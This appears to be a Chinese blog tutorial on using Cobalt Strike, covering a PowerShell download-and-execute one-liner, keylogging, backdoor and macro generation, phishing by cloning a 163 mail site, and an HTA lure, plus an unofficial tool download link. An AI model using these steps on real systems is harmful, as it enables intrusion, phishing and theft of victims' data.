Cobalt Strike工具基本使用

news2024/12/26 9:19:11

Cobalt Strike

  • 安装
  • 启动
        • 启动server端
        • 启动client
        • 目标机器连接
  • 工具基使用
      • 用户驱动攻击
        • 屏幕截图
        • 进程列表
        • 键盘记录
        • 文件管理
        • 远程vnc
        • 远程代理
        • 端口扫描
    • 生成后门
        • 被攻击者运行后门文件后查看结果
    • 钓鱼攻击
        • 信息收集
        • 网站克隆
        • 文件下载

安装

网盘地址:链接:https://pan.baidu.com/s/1GgKaueOjXUz_LPw34GjUWQ
提取码:0dqp

启动

启动server端

sudo ./teamserver 192.168.0.107 123456  # ip + 密码

在这里插入图片描述

启动client

在这里插入图片描述

目标机器连接

  1. 创建监听器
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述

复制内容
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.0.107:8080/a’))”

  1. 受害机执行利用语句

在这里插入图片描述

在这里插入图片描述

工具基使用

用户驱动攻击

屏幕截图

在这里插入图片描述

在这里插入图片描述

进程列表

在这里插入图片描述

键盘记录

  1. 选中需要监听应用后点击log keystrokes
    在这里插入图片描述

  2. 被攻击电脑操作键盘
    在这里插入图片描述

  3. 结束任务

jobs       #查看已有任务
jobkill  id值   #结束某任务

在这里插入图片描述

文件管理

在这里插入图片描述
在这里插入图片描述

远程vnc

查看用户操作页面
在这里插入图片描述

远程代理

在这里插入图片描述
在这里插入图片描述
》》然后本机的浏览器代理可以设置为上面的代理地址,我这没ie浏览器就不进行展示

端口扫描

方法一:使用页面功能直接扫描
在这里插入图片描述
方法二:命令行输入

portscan 192.168.0.109 1-1024,3389,5000-6000 arp 1024

在这里插入图片描述
扫描结果查看
在这里插入图片描述
查看服务情况
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

生成后门

方法一:
在这里插入图片描述
在这里插入图片描述

方法二:
在这里插入图片描述

在这里插入图片描述
wps方式:

新建word文件,开发工具中点击js宏,指定宏名称和宏位置
删除以有内容,复制生成的宏内容到word文件中
另存为带宏的文件
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
》》没办法运行就不展示运行结果了

方法三:
在这里插入图片描述

被攻击者运行后门文件后查看结果

在这里插入图片描述

钓鱼攻击

信息收集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

被攻击者浏览器运行生成的地址

http://192.168.0.107:80/baidu

在这里插入图片描述
》》不知道什么原因应用信息并没有查询到

网站克隆

已163邮箱为例子

在这里插入图片描述
在这里插入图片描述

文件下载

思路:
让被攻击者访问我们克隆的网站时,诱导目标下载后门文件并运行

  1. 生成后门文件地址
http://192.168.0.107:80/test.hta

在这里插入图片描述
2. 克隆网站

在这里插入图片描述
3. 目标网站浏览器运行地址并下载运行后门文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/568231.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

AntDB-S流式数据库体验

本文作者:彭冲老师,上一篇彭老师体验了亚信刚发布的社区版AntDB-T数据库,文章如下: AntDB-T交易型数据库体验 本文继续体验AntDB-S流式数据库的,AntDB-S目前还未开放社区版,可以联系AntDB小助手进行体验。…

电压放大器的主要指标有哪些方面

电压放大器是电子电路中常用的器件,在选择和评估电压放大器时,需要考虑以下几个主要指标: 输入电阻(Input Resistor):输入电阻是指放大器输入端的电阻值,它反映了放大器将输入信号转换成输出信号…

亚马逊,速卖通,国际站卖家在做测评时如何将风险降到最低呢?

测评是亚马逊卖家提升产品可信度和销售表现的重要手段 现在的测评市场遭到卖家们的极力吐槽,想要找到靠谱的资源也越来越难。据了解,去年很多骗子,中介都涌进测评市场,随意报价,导致整个市场鱼龙混杂,卖家…

MyBatis源码学习四之二级缓存

MyBatis源码学习四之二级缓存 MyBatis的缓存使用的也比较多,而缓存的都实现了一个父类的接口Cache。 一、加载缓存类PerputualCache public static void main(String[] args) {InputStream inputStream null;try {inputStream Resources.getResourceAsStream(&q…

NRK3303语音识别芯片在照明灯上的运用,一款可分布式语音IC方案

随着科技的不断进步,人们对于家居生活中的照明设备的要求也逐渐提高。传统的照明方式已经不能满足人们对智能家居的需求,我们需要更加智能、易于操作、高效节能的智能化照明系统。因此,智能照明应运而生,为我们提供了更加智能化、…

倍福触摸屏维修控制面板CP6606-0001-0020

适合控制柜安装的CP6600和CP6606面板型PC,适用于机械制造和设备工程等各种应用;可以安装TwinCAT自动化软件和 Windows Embedded操作系统,用作单独的控制器,也可以用作远程桌面显示器。 倍福触摸屏常见故障分类: 1、磨…

linux学习[11]磁盘与文件系统(2):lsblkblkidpartedfdiskgdiskmkfs

文章目录 前言:1. 磁盘容量1.1 lsblk1.2 blkid1.3 parted 2. 磁盘分区2.1 fdisk/gdisk2.2 磁盘分区实例参考: 3. 磁盘格式化3.1 mkfs.xfs3.2 mkfs.ext43.3 mkfs.vfat 总结: 前言: 写了VMware的磁盘扩容之后,磁盘分区格…

深度学习基础-卷积神经网络CNN+深度学习(无代码仅理解)

参考书籍:(找不到资源可以后台私信我) 《深度学习入门:基于Python的理论与实现 (斋藤康毅)》 CNN 概括 其中pooling层有时候会被省略,卷积层的输入输出图像称为特征图(feature map)&#xff0c…

多线程-Thread类的常用方法和生命周期

Thread类的常用结构 构造器 public Thread():分配一个新的线程对象。public Thread(String name):分配一个指定名字的新的线程对象。public Thread(Runnable target):指定创建线程的目标对象,它实现了Runnable接口中的run()方法。public Thread(Runnable target,S…

Python实现温度植被干旱指数(TVDI)的计算

前言 温度植被干旱指数(Temperature Vegetation Dryness Index,TVDI)是一种基于光学与热红外遥感通道数据进行植被覆盖区域表层土壤水分反演的方法。作为同时与归一化植被指数(NDVI)和地表温度(LST)相关的温度植被干旱指数(TVDI)可用于干旱监…

第二十五节:通信之WLAN(WiFi聚合)

欢迎大家一起学习探讨通信之WLAN。为了减少帧交互中额外资源占用开销,提高WiFi网络系统整体运行效率,802.11n协议引入定义了聚合功能。本节将基于协议定义内容和实例,详细分析“A-MSDU"和“A-MPDU”两种聚合功能。 关键字 S1G(Sub 1 GH…

linux0.12-10-6-tty_io.c

[539页] 10-6 tty_io.c程序 10-6-1 功能描述 每个tty设备有3个缓冲队列,分别是读缓冲队列(read_q)、写缓冲队列(write_q)和辅助缓冲队列(secondary),定义在tty_struct结构中(include/linux/tty.h)。 对于每个缓冲队列,读操作是从缓冲队列的…

数据可视化:部分整体类可视化图表大全

图表是处理数据的重要组成部分,因为它们是一种将大量数据压缩为易于理解的格式的方法。数据可视化可以让受众快速Get到重点。 数据可视化的图表类型极其丰富多样,而且每种都有不同的用例,通常,创建数据可视化最困难的部分是确定哪…

冯诺依曼体系结构详解

一.冯诺伊曼体系结构的概念: 约翰冯诺依曼(John von Neumann,1903.1.28-1957.2.8),美籍匈牙利数学家,计算机科学家,物理学家。是20世纪最重要的数学家之一,后来被称为计算机之父。 后…

计算机网络学习笔记-网络层

目录 概述 提供的两种服务:面向连接的虚电路、不面向连接的数据报 对比 虚拟互连网络 地址解析协议 ARP 主要作用 使用过程 位置 因特网控制报文协议 ICMP 作用 位置 种类 差错报告报文:终点不可达、源点抑制、时间超过、参数问题、改变路由…

【HMS Core】【ML Kit】活体检测FAQ合集

【问题描述1】 使用示例代码集成活体检测SDK时,报错state code -7001 【解决方案】 使用示例代码前请详细阅读示例工程中的“README”文件。您需要完成以下操作后才可以运行示例代码。 在AppGallery Connect网站下载自己应用的“agconnect-services.json”文件&a…

kaggle新赛推荐 | 从游戏中预测学生的表现

赛题名称:Predict Student Performance from Game Play 从游戏中预测学生的表现 赛题链接:https://www.kaggle.com/competitions/predict-student-performance-from-game-play 赛题背景 学习意味着有趣,这就是基于游戏的学习的用武之地。这…

Java大型货运系统源码(司机APP端+货主APP端)

技术架构:spring boot、mybatis、redis、vue、element-ui 开发语言:java 开发工具:idea、vscode、hbuilder 前端框架:vue 后端框架:spring boot 数 据 库:mysql 移 动 端:uniapp混合开发原…

数据结构与算法(七)

二叉树 如果说树中的每个结点最多只能有两个子结点,这样的树我们就称为二叉树,二叉树可以为空。 特点: 每个结点最多有两棵子树,所以二叉树中不存在度大于二的结点棵树中,最大的结点的度称为树的度,结点的度:结点所…